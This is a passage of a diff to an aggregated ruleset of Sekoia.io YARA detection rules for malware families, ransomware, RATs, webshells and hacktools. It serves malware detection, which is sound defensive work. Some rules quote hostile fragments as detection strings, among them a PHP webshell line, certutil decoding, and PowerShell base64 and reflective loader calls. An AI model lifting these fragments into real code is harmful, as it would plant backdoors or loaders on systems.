-		hash3 = "1e80a084ab89da2375bc3cc2f5a37975edff709ef29a3fa2b4df4ccb6d5afe10"
 
 	strings:
-		$s1 = "Z:/Go/awesomeProject3/main.go" wide ascii
+		$ = "DarkVision Installation" wide
+		$ = "You are about to install DarkVision Remote Access Tool." wide
 
 	condition:
-		uint32( 0 ) == 0x464c457f and filesize < 4000KB and $s1
+		uint16be( 0 ) == 0x4d5a and 2 of them
 }
-rule SEKOIA_Apt_Icepeony_Icecache : FILE
+rule SEKOIA_Hacktool_Impacket_Compiled_Binary : FILE
 {
 	meta:
-		description = "Detects IceCache backdoor"
+		description = "Detects generic PE embbeding impacket"
 		author = "Sekoia.io"
-		id = "3135c70e-c925-4d26-beed-09424fc0c153"
-		date = "2024-10-21"
+		id = "43936dcc-0d74-43dd-996a-c27a28cef283"
+		date = "2022-02-28"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_icepeony_icecache.yar#L1-L46"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "38708c33dafb5625ddde1030a7efa7db"
-		hash = "1e102c8909b2bf71c626b81f7526ee01"
-		hash = "34bc3c586a48f836b00aff59fe891b30"
-		hash = "cd906f4cef84dddeb644b06777474b2e"
-		hash = "add23fedfbf238f51173796f3feb12af"
-		hash = "25b8daaa5e9c5f8820261d7ebf79f3cd"
-		hash = "7fd45cc1de1230c916d5f547a9fc725c"
-		hash = "e6e4060e838d7af5f13ad64258d5db0c"
-		hash = "87dfc911885420380bea0cf74c8160d3"
-		hash = "bd15103b300cad635191972330913d17"
-		hash = "a8119b7803a6e0b8aed6bc74d9062b7f"
-		hash = "e1bc3efc33b57c9e1e6d37e5011228f2"
-		hash = "e1233a5f613aafec2c28133e810f536d"
-		hash = "fe88a5b91841b25b4bafa08d42faab22"
-		logic_hash = "db82489e1a1eb55960b7a8fd3e6f52db526295ed4e5b90ddea826c5be5f9a1c4"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/hacktool_impacket_compiled_binary.yar#L1-L36"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "133f9d0103774701894ea884bc2c52840b405fa21acb9ebab615816ec411b0bf"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -243352,40 +244093,42 @@ rule SEKOIA_Apt_Icepeony_Icecache : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Source Response Empty!"
-		$ = "Source Response Len:"
-		$ = "GetFromSource:"
-		$ = "Failed add header!"
-		$ = "Failed receive response:"
-		$ = "Error: Status Code :"
-		$ = "WinHttpAddRequestHeaders"
-		$ = "X-FORWARDED-HOST:"
-		$ = "PROXY_DEL_CONTENT"
-		$ = "PROXY_CLEAR_CONTENT"
-		$ = "PROXY_SET_JS"
-		$ = "PROXY_GET_JS"
-		$ = "PROXY_ALLOW_PC"
-		$ = "Parse IP failed :"
-		$ = "Clear Proxy Contents Success!"
-		$ = "FILE_UPLOAD"
-		$ = "FILE_DOWNLOAD"
+		$i1 = "impacket.crypto" fullword
+		$i2 = "impacket.dcerpc" fullword
+		$i3 = "impacket.ese" fullword
+		$i4 = "impacket.hresult_errors" fullword
+		$i5 = "impacket.krb5" fullword
+		$i6 = "impacket.nmb" fullword
+		$i7 = "impacket.nt_errors" fullword
+		$i8 = "impacket.ntlm" fullword
+		$i9 = "impacket.smb" fullword
+		$i10 = "impacket.smb3" fullword
+		$i11 = "impacket.smb3structs" fullword
+		$i12 = "impacket.smbconnection" fullword
+		$i13 = "impacket.spnego" fullword
+		$i14 = "impacket.structure" fullword
+		$i15 = "impacket.system_errors" fullword
+		$i16 = "impacket.tds" fullword
+		$i17 = "impacket.uuid" fullword
+		$i18 = "impacket.version" fullword
+		$i19 = "impacket.winregistry" fullword
+		$py = "PYZ-00.pyz"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 6 of them
+		uint16be( 0 ) == 0x4d5a and filesize > 1MB and 3 of ( $i* ) and $py
 }
-rule SEKOIA_Implant_Mac_Rustbucket : FILE
+rule SEKOIA_Hacktool_Win_Processhacker : FILE
 {
 	meta:
-		description = "Detect the RustBucket malware"
+		description = "Detect ProcessHacker hacktool"
 		author = "Sekoia.io"
-		id = "fcbb745d-7f56-4c51-9db5-427da22a0c68"
-		date = "2023-04-24"
+		id = "1dffe8c9-2ab7-4265-965e-8673b80f17d5"
+		date = "2022-09-09"
 		modified = "2024-12-19"
-		reference = "https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/implant_mac_rustbucket.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "9ca914b1cfa8c0ba021b9e00bda71f36cad132f27cf16bda6d937badee66c747"
-		logic_hash = "ab7bc706b0d3f0dcd739ffe7f8153ba7377892143d8d53ce1591519ffe4ae84f"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/hacktool_win_processhacker.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "cfcfaa7f3afc8b82ce0188d9ead63746a7effd40acb6ad504f8d70a45d8476d5"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -243393,26 +244136,25 @@ rule SEKOIA_Implant_Mac_Rustbucket : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "/Users/hero/"
-		$ = "PATHIpv6Ipv4Bodyslotpath"
-		$macho_magic = {CF FA ED FE}
-		$java_magic = {CA FE BA BE}
+		$str0 = "Unable to uninstall KProcessHacker" wide
+		$str1 = "Process Hacker's settings file is corrupt. Do you want to reset it?" wide
+		$str2 = "Process Hacker uses the following components:" wide
 
 	condition:
-		($macho_magic at 0 or $java_magic at 0 ) and all of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SEKOIA_Generic_Php_Webshell : FILE
+rule SEKOIA_Ransomware_Win_Karma : FILE
 {
 	meta:
-		description = "Detects generic webshell"
+		description = "Detect the Karma ransomware payload"
 		author = "Sekoia.io"
-		id = "415a96bd-11a4-40e7-8335-ac1f1a99d17c"
-		date = "2023-12-08"
+		id = "efd87a17-7c99-404a-8ea6-2f5c2121f9f2"
+		date = "2021-08-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/generic_php_webshell.yar#L1-L15"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "617264a785b8e9e87a39e12d7b72963d94e0686a174716347369fe71ab7a78af"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/ransomware_win_karma.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "ef272be7ae5fea084120db95f7b002e9061d72442836e836ca43ddc7b461be4e"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -243420,23 +244162,28 @@ rule SEKOIA_Generic_Php_Webshell : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "system($_POST['a']);"
+		$a1 = "KARMA" ascii
+		$u1 = "KARMA" wide
+		$u2 = "-ENCRYPTED.txt" wide
+		$u3 = "Encrypting directory:" wide
+		$u4 = "Encrypting file:" wide
+		$u5 = "Trying to import ECC public key..." wide
 
 	condition:
-		all of them and filesize < 500
+		uint16( 0 ) == 0x5A4D and filesize < 150KB and all of them
 }
-rule SEKOIA_Apt_Shadowpad_First_Called_Function : FILE
+rule SEKOIA_Tool_Exploit_Rottenpotato_Strings : FILE
 {
 	meta:
-		description = "Detects entrypoint of shadowpad"
+		description = "Detects RottenPotato compiled binaries"
 		author = "Sekoia.io"
-		id = "3ce1ffd3-5c30-4b36-b7cc-c9fa873ebc25"
-		date = "2023-01-30"
+		id = "453646d4-b128-40ea-8840-4c53b8f1e486"
+		date = "2022-09-09"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_shadowpad_first_called_function.yar#L1-L36"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "a40db3fad01f4177973fd50bd489e5c4ff6d3592dfff063c2c31694007c31e0b"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_exploit_rottenpotato_strings.yar#L1-L27"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "c634fcced6889caf895ddf57bab5564fb2b0a4c83f1d6ba4dae655f2e5d935db"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -243444,234 +244191,213 @@ rule SEKOIA_Apt_Shadowpad_First_Called_Function : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$chunk_1 = {
-        48 83 EC 28
-        33 C9
-        FF 15 ?? ?? ?? ??
-        8B 80 ?? ?? ?? ??
-        3B 05 ?? ?? ?? ??
-        74 ??
-        E8 ?? ?? ?? ??
-        E8 ?? ?? ?? ??
-        EB ??
-        48 8B 0D ?? ?? ?? ??
-        E8 ?? ?? ?? ??
-        8B C8
-        FF 15 ?? ?? ?? ??
-        90
-        B9 28 04 00 00
-        FF 15 ?? ?? ?? ??
-        90
-        48 83 C4 28
-        C3
-        }
+		$ = "WSAStartup failed with error: %d"
+		$ = "getaddrinfo failed with error: %d"
+		$ = "RPC -> send failed with error: %d"
+		$ = "RPC-> Connection closed"
+		$ = "COM -> bytes sent: %d"
+		$ = "COM -> recv failed with error: %d"
+		$ = "Running %S with args %S"
+		$ = "[-] Failed to create proc: %d"
+		$ = "Waiting for auth..."
+		$ = "Auth result: %d"
+		$ = "SeImpersonatePrivilege" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 8 of them
 }
-rule SEKOIA_Rat_Win_Atharvan
+rule SEKOIA_Apt_Mustangpanda_Tinynote : FILE
 {
 	meta:
-		description = "Detect Atharvan RAT"
+		description = "Detects strings in TinyNote backdoor"
 		author = "Sekoia.io"
-		id = "61347490-d281-4892-adba-89cf6187545f"
-		date = "2023-02-23"
+		id = "a2b9bea4-a211-456f-8a3f-0f31733e8b29"
+		date = "2023-06-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/rat_win_atharvan.yar#L1-L15"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "fee9a5a684b3e9bd629a0e87bdf63ba0c1fc1e970ca3b7fec8d7a4f2f60a355a"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_mustangpanda_tinynote.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "20723b449d057ddf09fa34aa7511275939f98c6c84593af64d99f980c679b2c1"
 		score = 75
-		quality = 78
-		tags = ""
+		quality = 80
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = {44 3a 5c 72 61 6e 67 5c 54 4f 4f 4c 5c 33 52 41 54}
+		$s1 = "bypassSMADAV" ascii fullword
+		$s2 = "excuteCmdLine" ascii fullword
+		$s3 = "/Create1953125" ascii
+		$s4 = "MINUTEMonday" ascii
+		$s5 = "WndProc" ascii
 
 	condition:
-		all of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 8MB and all of them
 }
-rule SEKOIA_Hacktool_Win_Uknowseckeylogger : FILE
+
+rule SEKOIA_Ransomware_Win_Blackmatter
 {
 	meta:
-		description = "Detect the uknowsec keylogger based on strings"
+		description = "Detect Black matter ransomware (2021-07-23)"
 		author = "Sekoia.io"
-		id = "ab08136d-b1f3-4e64-b73c-e6344b610f91"
-		date = "2022-10-05"
+		id = "9b2d8ac3-b4d1-40f5-ac57-411547dcb2cf"
+		date = "2021-08-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/hacktool_win_uknowseckeylogger.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "83a731a5b1853edcce963d458fc170206086305f3e43403c930c9633918e8ff1"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/ransomware_win_blackmatter.yar#L4-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "5a407a9901314211e13bef30254f1d129cf3c731ea970abff8602f1ae40177cb"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
-	strings:
-		$str0 = "github.com/atotto/clipboard" ascii
-		$str1 = "github.com/TheTitanrain/w32" ascii
-		$str2 = "github.com/aliyun/aliyun-oss-go-sdk" ascii
-		$str3 = "golang.org/x/sys" ascii
-		$str4 = "golang.org/x/time" ascii
-		$str5 = "WSARecvWSASend[Print][Right][Shift][Sleep][debug][error]" ascii
-
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "5e89d335de2021a2c268acf00ec513e5" )
 }
-rule SEKOIA_Apt_Kimsuky_Malicious_Vba : FILE
+rule SEKOIA_Hafnium_Tarrask_Malware
 {
 	meta:
-		description = "Detects malicious VBA used by Kimsuky"
+		description = "Hunting rule to look for Tarrask malware"
 		author = "Sekoia.io"
-		id = "2dbe2431-3592-4395-8164-49abae4a5a3d"
-		date = "2022-08-30"
+		id = "6f1728d6-dc9b-4ea7-8656-2b069ee269a0"
+		date = "2022-04-14"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_kimsuky_malicious_vba.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "68d7b757f660907fcea3ea03c4027b429f8acdef6569d63cdb744e9d77637080"
-		score = 75
-		quality = 80
-		tags = "FILE"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/hafnium_tarrask_malware.yar#L1-L16"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "f9309707d25cfe6bccf050f24e14c42b53f3d017916a02eaada74c4782efdd5c"
+		score = 50
+		quality = 76
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Certutil -decode %TMP%"
-		$ = "%LOCALAPPDATA%\\Microsoft\\Office"
+		$s1 = "delete sd success" wide ascii nocase
+		$s2 = "Task successfully registered." wide ascii nocase
 
 	condition:
-		uint32be( 0 ) == 0xD0CF11E0 and filesize < 1MB and all of them
+		all of them
 }
-rule SEKOIA_Tool_Ladon_Strings : FILE
+rule SEKOIA_Apt_Uac0099_Lonepage : FILE
 {
 	meta:
-		description = "Detects Ladon based on strings"
+		description = "Detects LonePage vbs malware"
 		author = "Sekoia.io"
-		id = "7f06f755-a103-4e74-a9df-136355775233"
-		date = "2024-06-03"
+		id = "007f62f5-da5c-4df7-8b5c-5ed815ce6993"
+		date = "2024-01-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_ladon_strings.yar#L1-L61"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "6f2a34bddea2a2370c0a45cde888f51632689973373e3c6ba739a34dc220bfa1"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_uac0099_lonepage.yar#L1-L30"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "479f438acb63c76e09722640b973e76d1f1924bf24db477ca6898d123091d5f8"
 		score = 75
-		quality = 78
+		quality = 76
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$a1 = ".GetType('Ladon.Scan')"
-		$a2 = "= New-object Byte[]("
-		$a3 = "([IO.MemoryStream][Convert]::FromBase64String("
-		$b1 = "DeflateStream([IO.MemoryStream][Convert]::FromBase64String("
-		$b2 = "))}}}}}}}}}"
-		$b3 = "::Main(@($"
-		$b4 = "))} else {If("
-		$b5 = "= [Reflection.Assembly]::Load("
-		$c1 = "ChatLadon.Form1.resources"
-		$c2 = "ChatLadon.Properties.Resources.resources"
-		$c3 = "WebClientUploadEvent"
-		$c4 = "WebClientDownloadEvent"
-		$c5 = "K8robot"
-		$c6 = "K8IPselect"
-		$d1 = "loadASM"
-		$d2 = "ConsoleApp1.exe"
-		$d3 = "K8Ladon"
-		$e1 = "get_network_16px_1219919_easyicon_net"
-		$e2 = "K8gege"
-		$e3 = "LadonExpBuild"
-		$f1 = "Ladon url.txt CitrixVer"
-		$f2 = "Ladon MssqlCmd"
-		$f3 = "Example: Ladon "
-		$f4 = "k8gege.org"
-		$f5 = "K8crack"
-		$g1 = "LadonStudy.exe"
-		$g2 = "LadonStudy.frmMain.resources"
-		$g3 = "LadonStudy.Properties.Resources.resources"
-		$g4 = "K8gege"
-		$h1 = "LadonShell.exe" wide
-		$h2 = "ForceRemove"
-		$h3 = "GetUserObjectInformationA"
+		$s0 = "dim r, c" ascii fullword
+		$s1 = "= createobject(\"WScript.Shell\")" ascii fullword
+		$s2 = "r.Run c, 0, false" ascii fullword
+		$t1 = "GetHostAddresses" ascii fullword nocase
+		$t2 = "upgrade.txt" ascii fullword nocase
+		$t3 = "net.webclient" ascii fullword nocase
+		$t4 = "downloaddata" ascii fullword nocase
+		$t5 = "[System.Environment]::NewLine" ascii fullword nocase
+		$t6 = ".uploaddata('" ascii nocase
 
 	condition:
-		( all of ( $a* ) or all of ( $b* ) or all of ( $c* ) or all of ( $d* ) or all of ( $e* ) or all of ( $f* ) or all of ( $g* ) or all of ( $h* ) ) and filesize < 5MB
+		true and filesize < 10KB and ( ( $s1 at 0x10 and $s0 at 0 and $s2 and 2 of ( $t* ) ) or ( all of ( $t* ) and any of ( $s* ) ) )
 }
-
-rule SEKOIA_Launcher_Win_Mistcloak : FILE
+rule SEKOIA_Loader_Win_Operationmagalenha_Vbs
 {
 	meta:
-		description = "Detect the MISTCLOAK malware"
+		description = "Finds VBS file loading the PeepingTitle backdoor"
 		author = "Sekoia.io"
-		id = "3dbf5efa-d77c-436a-a080-9ac58a78425f"
-		date = "2022-12-01"
+		id = "b1f705d1-de3e-4ce6-9bb7-0e39b6e79add"
+		date = "2023-05-31"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/launcher_win_mistcloak.yar#L4-L33"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "fc2731ec4e2917be1ad169908ed324931a93f6998aee606319750b5cc02715e2"
+		reference = "https://www.sentinelone.com/labs/operation-magalenha-long-running-campaign-pursues-portuguese-credentials-and-pii/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/loader_win_operationmagalenha_vbs.yar#L1-L39"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "bb1c48ea6a4d9f0bc04df558837f2d448b38eac920cb4030e01b915a4e442708"
 		score = 75
-		quality = 80
-		tags = "FILE"
+		quality = 78
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "\\usb.ini"
-		$ = "autorun.inf\\Protection for Autorun\\System Volume Information"
-		$ = "G:\\project\\APT\\U"
-		$ = "\\new\\u2ec\\Release\\u2ec.pdb"
-		$ = "CheckUsbService"
+		$str01 = "'Skip to content" ascii
+		$str02 = "'Search" ascii
+		$str03 = "'Sign in" ascii
+		$str04 = "'Sign up" ascii
+		$str05 = "'Code" ascii
+		$str06 = "'Terms" ascii
+		$str07 = "'Privacy" ascii
+		$str08 = "'Security" ascii
+		$str09 = "'Status" ascii
+		$str10 = "'Docs" ascii
+		$str11 = "'Contact GitHub" ascii
+		$str12 = "'Pricing" ascii
+		$str13 = "'API" ascii
+		$str14 = "'Training" ascii
+		$str15 = "'Blog" ascii
+		$str16 = "'About" ascii
+		$vbs01 = "WScript.Sleep" ascii nocase
+		$vbs02 = "Set obj" ascii nocase
+		$vbs03 = "Dim obj" ascii nocase
+		$vbs04 = "https://tinyurl.com" ascii nocase
+		$vbs05 = "C:\\Users\\Public" ascii nocase
+		$vbs06 = "CreateObject(\"WScript.Shell\")" ascii nocase
+		$vbs07 = ".SaveToFile" ascii nocase
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 3 of them or hash.md5 ( pe.rich_signature.clear_data ) == "0f5082fd7ddd1950fa332a8fa4df052f" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "0ceac625db1e8405efe45d47486e9e2d" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "6968e6ac7b9c1dfbf40a0b3c4f6f4157" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "e6ed2da41f74e948cba7a002c41c6af5" )
+		10 of ( $str* ) and 5 of ( $vbs* )
 }
-rule SEKOIA_Emmenhtal_Strings_Hta_Exe : FILE
+rule SEKOIA_Exploit_Linux_Eop_Cve202121974_Exploit_Strings : CVE_2021_21974 FILE
 {
 	meta:
-		description = "Emmenhtal Loader string"
+		description = "Detects CVE-2021-21974 Local Privesc exploit"
 		author = "Sekoia.io"
-		id = "64e08610-e8a4-4edd-8f6b-d4e8d2b47d87"
-		date = "2024-09-06"
+		id = "8e1fbbe5-7d51-48b4-80d5-90abff8cab9e"
+		date = "2023-12-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/emmenhtal_strings_hta_exe.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "e86a22f1c73b85678e64341427c7193ba65903f3c0f29af2e65d7c56d833d912"
-		logic_hash = "93f85a4ccb58c6aeb664c4c843ff80a4ab7b4308a944537f7ebe087515a61659"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/exploit_linux_eop_cve202121974_exploit_strings.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "a2e6e2660fcbf6ffa80809c02ca78fae85d27f6cd8d2c83bb2645a86124ca7f2"
 		score = 75
-		quality = 55
-		tags = "FILE"
+		quality = 80
+		tags = "CVE-2021-21974, FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$char = / = String\.fromCharCode\([a-zA-Z]{2,4},[a-zA-Z]{2,4},/
-		$var = "var "
-		$eval = "eval("
-		$script1 = "<script>"
-		$script2 = "</script>MZ"
+		$ = ".name.replace('Thread','SLP Client'"
+		$ = "print('[' + name + '] recv: ', d)"
+		$ = "requests[28].put(connect())"
+		$ = "[+] stack enviorn address:"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them and $var in ( @script1 .. @script1 + 2000 ) and $char in ( @var .. @var + 100 )
+		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and all of them
 }
-rule SEKOIA_Apt_Reaper_2Fa_Phishing_Webpage
+rule SEKOIA_Vpn_Mul_Softether
 {
 	meta:
-		description = "Detects Reaper 2FA phishing webpage"
+		description = "Detect the open-source SoftEther VPN"
 		author = "Sekoia.io"
-		id = "348ca2ad-c8f9-4aed-8a27-95caa3a34f4b"
-		date = "2023-03-09"
+		id = "a1fbf4fe-b934-4a66-b6b1-ebe2f83505cd"
+		date = "2024-04-15"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_reaper_2fa_phishing_webpage.yar#L1-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "3f0ae0b35ea181b4712feeb34e866519921917179297148982e5298df9f133a9"
+		reference = "https://www.softether.org/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/vpn_mul_softether.yar#L1-L29"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "f93e838631518590e518f29557c60a40734da30b62c056f8ebb8febed389551b"
 		score = 75
 		quality = 80
 		tags = ""
@@ -243679,31 +244405,35 @@ rule SEKOIA_Apt_Reaper_2Fa_Phishing_Webpage
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "setTimeout(checkUpload,"
-		$ = "commChannel.addListener("
-		$ = "else if(commType =="
-		$ = "?dir=DOWN&method=READ&id="
-		$ = "Content : base64_encode(upload_data)"
-		$ = "$.post(upHttpRelayer"
-		$ = "var ablyUpData = {"
-		$ = "initComm();"
-		$ = "function Next(arg) {"
+		$ = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\softether_se%s"
+		$ = "GET /vgc_download_dat/ HTTP/1.1"
+		$ = "http://x%c.x%c.client.api.vpngate2.jp/api/"
+		$ = "http://x0.x0.client.api.vpngate2.jp/check/check.txt"
+		$ = "https://x%c.x%c.statistics.api.vpngate2.jp/api/statistics/"
+		$ = "Software\\SoftEther Project\\SoftEther VPN\\"
+		$ = "|vpnsetup_nosign.exe" wide
+		$ = "/ISEASYINSTALLER:%u" wide
+		$ = "/CALLERSFXPATH:\"%s\"" wide
+		$ = "vpn_client.config" wide
+		$ = "vpn_bridge.config" wide
+		$ = "|backup_dir_readme.txt" wide
+		$ = "vpn_debuginfo_%04u%02u%02u_%02u%02u%02u.zip" wide
 
 	condition:
-		3 of them
+		8 of them
 }
-rule SEKOIA_Infostealer_Win_Raccoon_Str_Takemypainback : FILE
+rule SEKOIA_Guloader_Powershell_1 : FILE
 {
 	meta:
-		description = "Detect Raccoon based on specific strings"
+		description = "Powershell downloading decoy and delivering GuLoader"
 		author = "Sekoia.io"
-		id = "2148636e-47c7-4bf2-8d1e-df68faf65111"
-		date = "2022-10-03"
+		id = "28c68991-db8b-4f00-b3a3-17286418a4ed"
+		date = "2024-02-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_raccoon_str_takemypainback.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "50d30828dab7e197619eeac4ebd2ab6692a9ac40a5091e23642cd1bdde8e9910"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/guloader_powershell_1.yar#L1-L18"
